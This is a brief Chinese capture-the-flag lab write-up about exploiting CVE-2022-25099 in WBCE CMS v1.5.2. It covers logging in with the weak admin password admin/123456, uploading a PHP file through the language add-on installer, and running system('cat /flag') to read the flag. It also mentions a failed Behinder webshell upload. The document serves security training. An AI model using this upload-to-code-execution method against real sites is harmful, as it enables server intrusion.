春秋云镜 CVE-2022-25099 WBCE CMS v1.5.2 RCE
靶标介绍
WBCE CMS v1.5.2 /language/install.php 文件存在漏洞,攻击者可精心构造文件上传造成RCE
启动场景
漏洞利用
打开首页提示网站正在建设,随手/admin跳转登录页面
http://eci-2zebhcoic1xyruwapftd.cloudeci1.ichunqiu.com/admin/login/
admin/123456弱口令登录成功
寻找上传点languages/index.php,“Add-ons”–“languages” 上传冰蝎马,失败。
上传phphinfo成功,<?php phpinfo();?>
那就直接system执行cat /flag
<?php
system('cat /flag');phpinfo();?>
?>
得到flag
flag{6c6dfde2-f367-4424-b6c8-bf37f968b622}